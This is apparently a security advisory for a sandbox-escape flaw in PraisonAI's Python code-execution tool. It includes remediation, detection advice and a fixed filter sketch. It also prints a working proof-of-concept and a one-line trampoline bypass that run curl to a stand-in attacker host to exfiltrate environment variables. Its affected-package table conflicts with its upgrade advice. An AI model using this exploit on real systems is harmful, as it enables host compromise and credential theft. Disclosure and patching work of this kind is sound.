PraisonAI's Python execution sandbox, intended to safely run untrusted agent code, can be completely circumvented using a Python type system trampoline — a technique that transforms a blocked attribute access into an unblocked method call, requiring nothing more than the ability to submit code to the agent. Any multi-tenant platform, CI/CD pipeline, or agentic deployment that allows users to submit Python code for execution is exposed to full host compromise, including exfiltration of environment variables, API keys, and arbitrary file contents with the privileges of the host process. A public proof-of-concept demonstrates end-to-end exploitation in under fifteen lines, and with 31 prior CVEs recorded against the same package, this is part of a discernible pattern of security debt in PraisonAI's codebase that warrants elevated scrutiny. Upgrade to praisonaiagents >= 4.5.128 immediately; where patching is not immediately possible, wrap execution workers in OS-level isolation — containers with no-new-privileges, seccomp profiles, or a dedicated low-privilege user — and rotate any credentials accessible to the process environment.
Risk Assessment
High risk. CVSS 8.6 with Scope:Changed reflects the attacker's ability to pivot from the Python sandbox to the underlying host process, and Attack Complexity:Low confirms no special conditions, races, or leaked pointers are required — only the ability to submit Python code to the agent. The publicly available PoC lowers the exploitation bar substantially: only moderate skill is required. Environments running PraisonAI in multi-tenant or shared contexts are at greatest risk, since a single tenant's crafted payload can reach host-level credentials and potentially pivot to adjacent infrastructure. Single-user local deployments have a narrower attack surface but remain at risk from malicious tool inputs or notebook content.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI | pip | < 4.5.128 | 4.5.128 |
| praisonaiagents | pip | — | No patch |
Recommended Action
- Patch: Upgrade to praisonaiagents >= 4.5.128 immediately. Verify the patch extends AST filtering to cover string constants passed as arguments to `type.__getattribute__` and similar dynamic dispatch methods — not just `ast.Attribute` nodes.
- Containment (if immediate patch is not possible): Run PraisonAI agent workers in isolated containers with seccomp/AppArmor profiles, read-only filesystems, no-new-privileges flags, and no access to host network or sensitive credential mounts.
- Secret rotation: Rotate any API keys, database credentials, or cloud tokens accessible to PraisonAI process environments, especially in shared or multi-tenant deployments where prior exploitation cannot be ruled out.
- Detection: Alert on outbound network connections from PraisonAI worker processes to unexpected destinations; monitor for curl, wget, or shell spawns as child processes of the agent runtime; log all code submissions for forensic review.
- Defense-in-depth: Evaluate replacing or augmenting the AST-based approach with a process-level sandbox (nsjail, gVisor, or a Wasm runtime) for any production system executing untrusted code, as AST filtering is structurally insufficient for this threat model.
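To illustrate the patch-verification point above, the following is a minimal, hypothetical sketch of an extended AST filter; `BLOCKED_ATTRS` and `check_code` are illustrative names, not PraisonAI's actual API. It rejects blocked names whether they appear as attribute accesses or as string constants (the trampoline form):

```python
import ast

BLOCKED_ATTRS = {"__subclasses__", "__globals__", "__bases__", "__getattribute__"}

def check_code(code: str) -> None:
    """Reject code that references a blocked attribute either as a direct
    attribute access or as a string constant (e.g. an argument passed to
    type.__getattribute__ or getattr)."""
    tree = ast.parse(code)
    for node in ast.walk(tree):
        # Direct attribute access: obj.__subclasses__
        if isinstance(node, ast.Attribute) and node.attr in BLOCKED_ATTRS:
            raise ValueError(f"blocked attribute: {node.attr}")
        # String constant naming a blocked attribute: '__subclasses__'
        if (isinstance(node, ast.Constant)
                and isinstance(node.value, str)
                and node.value in BLOCKED_ATTRS):
            raise ValueError(f"blocked name in string constant: {node.value}")

# The trampoline from the PoC is now rejected:
try:
    check_code("type.__getattribute__(int, '__subclasses__')")
except ValueError:
    print("rejected")
```

Blocking every string constant that matches a dunder name is deliberately coarse, and AST filtering remains structurally weak for this threat model, so a check like this complements rather than replaces process-level isolation.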
Frequently Asked Questions
What is CVE-2026-40158?
CVE-2026-40158 is a sandbox-escape vulnerability in PraisonAI's AST-based Python execution sandbox. A `type.__getattribute__` trampoline turns a blocked attribute access into an unblocked method call, letting submitted code escape the sandbox and run arbitrary commands with the privileges of the host process, exposing environment variables, API keys, and file contents. The fix is to upgrade to praisonaiagents >= 4.5.128; until then, isolate execution workers at the OS level and rotate any credentials accessible to the process environment.
Is CVE-2026-40158 actively exploited?
No confirmed active exploitation of CVE-2026-40158 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-40158?
1. Patch: Upgrade to praisonaiagents >= 4.5.128 immediately. Verify the patch extends AST filtering to cover string constants passed as arguments to `type.__getattribute__` and similar dynamic dispatch methods — not just `ast.Attribute` nodes.
2. Containment (if immediate patch is not possible): Run PraisonAI agent workers in isolated containers with seccomp/AppArmor profiles, read-only filesystems, no-new-privileges flags, and no access to host network or sensitive credential mounts.
3. Secret rotation: Rotate any API keys, database credentials, or cloud tokens accessible to PraisonAI process environments, especially in shared or multi-tenant deployments where prior exploitation cannot be ruled out.
4. Detection: Alert on outbound network connections from PraisonAI worker processes to unexpected destinations; monitor for curl, wget, or shell spawns as child processes of the agent runtime; log all code submissions for forensic review.
5. Defense-in-depth: Evaluate replacing or augmenting the AST-based approach with a process-level sandbox (nsjail, gVisor, or a Wasm runtime) for any production system executing untrusted code, as AST filtering is structurally insufficient for this threat model.
What systems are affected by CVE-2026-40158?
This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, Multi-tenant AI platforms, CI/CD pipelines with AI code execution, LLM code execution environments, Automated agentic workflows.
What is the CVSS score for CVE-2026-40158?
CVE-2026-40158 has a CVSS v3.1 base score of 8.6 (HIGH).
Technical Details
NVD Description
PraisonAI's AST-based Python sandbox can be bypassed using a `type.__getattribute__` trampoline, allowing arbitrary code execution when running untrusted agent code.

## Description

The `_execute_code_direct` function in `praisonaiagents/tools/python_tools.py` uses AST filtering to block dangerous Python attributes like `__subclasses__`, `__globals__`, and `__bases__`. However, the filter only checks `ast.Attribute` nodes: it fails to account for dynamic attribute resolution via built-in methods such as `type.__getattribute__`, resulting in incomplete enforcement of the sandbox's restrictions. The bypass is a single call:

```python
type.__getattribute__(obj, '__subclasses__')  # Bypasses filter
```

The string `'__subclasses__'` is an `ast.Constant`, not an `ast.Attribute`, so it is never checked against the blocked list.

## Proof of Concept

```python
# This code bypasses the sandbox and achieves RCE
t = type
int_cls = t(1)

# Bypass blocked __bases__ via type.__getattribute__
bases = t.__getattribute__(int_cls, '__bases__')
obj_cls = bases[0]

# Bypass blocked __subclasses__
subclasses_fn = t.__getattribute__(obj_cls, '__subclasses__')
all_subclasses = subclasses_fn()

# Find _wrap_close class
for c in all_subclasses:
    if t.__getattribute__(c, '__name__') == '_wrap_close':
        # Get __init__.__globals__ via bypass
        init = t.__getattribute__(c, '__init__')
        glb = type(init).__getattribute__(init, '__globals__')
        # Get system function and execute
        system = glb['system']
        system('curl https://attacker.com/steal --data "$(env | base64)"')
```

---

## Impact

This vulnerability allows attackers to escape the intended Python sandbox and execute arbitrary code with the privileges of the host process.
An attacker can:

* Access sensitive data such as environment variables, API keys, and local files
* Execute arbitrary system commands
* Modify or delete files on the system

In environments that execute untrusted code (e.g., multi-tenant agent platforms, CI/CD pipelines, or shared systems), this can lead to full system compromise, data exfiltration, and potential lateral movement within the infrastructure.

---

## Affected Code

```python
# praisonaiagents/tools/python_tools.py (approximate)
def _execute_code_direct(code, ...):
    tree = ast.parse(code)
    for node in ast.walk(tree):
        # Only checks ast.Attribute nodes
        if isinstance(node, ast.Attribute) and node.attr in blocked_attrs:
            raise SecurityError(...)
    # Bypass: string arguments are not checked
    exec(compiled, safe_globals)
```

**Reporter:** Lakshmikanthan K (letchupkt)
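The root cause is easy to confirm with the standard `ast` module: in the trampoline form, the dangerous name is an `ast.Constant`, so a filter that walks only `ast.Attribute` nodes never sees it. A small self-contained demonstration (`obj` and `f` are placeholder names):

```python
import ast

blocked = ast.parse("obj.__subclasses__")        # attribute-access form
bypass  = ast.parse("f(obj, '__subclasses__')")  # string-constant (trampoline) form

attr_names = [n.attr for n in ast.walk(blocked) if isinstance(n, ast.Attribute)]
bypass_attrs = [n.attr for n in ast.walk(bypass) if isinstance(n, ast.Attribute)]
const_strs = [n.value for n in ast.walk(bypass)
              if isinstance(n, ast.Constant) and isinstance(n.value, str)]

print(attr_names)    # ['__subclasses__']  -> caught by the filter
print(bypass_attrs)  # []                  -> nothing for the filter to check
print(const_strs)    # ['__subclasses__']  -> never inspected
```

The same blind spot applies to any dynamic lookup that takes the attribute name as data, such as `getattr(obj, name)` or `object.__getattribute__`.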
Exploitation Scenario
An attacker targeting a SaaS platform built on PraisonAI submits a seemingly functional data-processing script as part of normal platform usage. The script uses type.__getattribute__ to traverse the Python class hierarchy — bypassing the AST filter's blocked-attribute list, because the dangerous attribute names are passed as string constants rather than attribute nodes — to reach _wrap_close.__init__.__globals__, which contains a live reference to the os.system function. The attacker calls system('curl https://attacker.com/exfil --data "$(env | base64)"'), exfiltrating all environment variables including cloud provider credentials, database connection strings, and third-party API keys in a single HTTP request. With those credentials, the attacker moves laterally to the cloud control plane or adjacent databases, escalating from a single code submission to a full infrastructure breach affecting every tenant on the platform.
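The shell spawn at the end of this scenario is exactly what the detection guidance under Recommended Action aims to catch. One lightweight, in-process tripwire can be sketched with CPython's audit hooks; `os.system` and `subprocess.Popen` are documented audit event names. This is a worker-side sketch, not a substitute for host-level monitoring:

```python
import sys

suspicious = []

def audit_hook(event, args):
    # Flag process/shell spawns originating inside the agent runtime.
    if event in ("os.system", "subprocess.Popen"):
        suspicious.append(event)

sys.addaudithook(audit_hook)  # note: hooks cannot be removed once installed

import os
os.system("true")  # a payload's shell spawn would be recorded here

print(suspicious)  # ['os.system']
```

Because the hook runs inside the same interpreter as the untrusted code, a determined attacker can tamper with it; treat it as telemetry feeding the external alerting described above.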
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Related Vulnerabilities
- CVE-2026-39890 (CVSS 9.8, same package: praisonai) — PraisonAI: YAML deserialization enables unauthenticated RCE
- GHSA-vc46-vw85-3wvm (CVSS 9.8, same package: praisonai) — PraisonAI: RCE via malicious workflow YAML execution
- GHSA-2763-cj5r-c79m (CVSS 9.7, same package: praisonai) — PraisonAI: RCE via shell injection in agent workflows
- CVE-2026-40154 (CVSS 9.3, same package: praisonai) — PraisonAI: supply chain RCE via unverified template exec
- GHSA-8x8f-54wf-vv92 (CVSS 9.1, same package: praisonai) — PraisonAI: auth bypass enables browser session hijack